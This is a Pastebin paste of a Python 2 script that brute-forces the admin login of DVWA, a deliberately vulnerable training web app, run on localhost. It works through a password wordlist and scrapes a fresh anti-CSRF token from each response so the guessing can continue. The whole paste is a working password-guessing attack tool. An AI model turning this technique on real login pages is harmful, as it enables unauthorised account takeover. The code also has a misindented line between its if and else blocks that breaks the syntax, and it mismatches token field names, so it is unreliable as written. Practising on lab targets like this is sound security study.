mafiakid

bruteforce

Apr 21st, 2017
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.47 KB | None | 0 0
  1. from sys import argv
  2. import requests
  3. from BeautifulSoup import BeautifulSoup as Soup
  4. #to give our arguments friendly name
  5. scripts, filename, success_message =argv
  6. txt = open(filename)
  7. url = "http://127.0.0.1/DVWA-master/vulnerabilities/brute/index.php"
  8. cookie = {'security' :'high' , 'PHPSESSID' : 'hnl44rto0q0vhd1eahjsdfml35'}
  9. s = requests.Session()
  10. target_page = s.get(url,cookies=cookie)
  11. def checksuccess(html):
  12.     soup = Soup(html)
  13.     search = soup.findAll(text=success_message)
  14.     print  search
  15.     if not search:
  16.         success = False
  17.     else:
  18.         success = True
  19.  
  20.     return success
  21.  
  22. page_source =target_page.text
  23.  
  24. soup =Soup(page_source)
  25.  
  26.  
  27. csrf_token = soup.findAll(attrs={"name" : "user_token"})[0].get('value')
  28. print "**********Your csrf token*************" + repr(csrf_token)
  29.  
  30. with open(filename) as f:
  31.     for password in f:
  32.         payload = {"username" : "admin" , "password" : password.strip('\n') , "Login" :"Login" ,"csrf_token" : str(csrf_token)}
  33.         print payload
  34.         r = s.get(url , cookies = cookie , params = payload)
  35.         print  r.text
  36.         success = checksuccess(r.text)
  37.         if not success:
  38.             soup =Soup(r.text)
  39.             csrf_token = soup.findAll(attrs={"name" : "user_token"})[0].get('value')
  40.         print "**********Your csrf token*************" + csrf_token
  41.  
  42.         else:
  43.             print "Your password is" +password
  44.             break
  45.     if not success:
  46.         print "Brute force failed"
Add Comment
Please, Sign In to add comment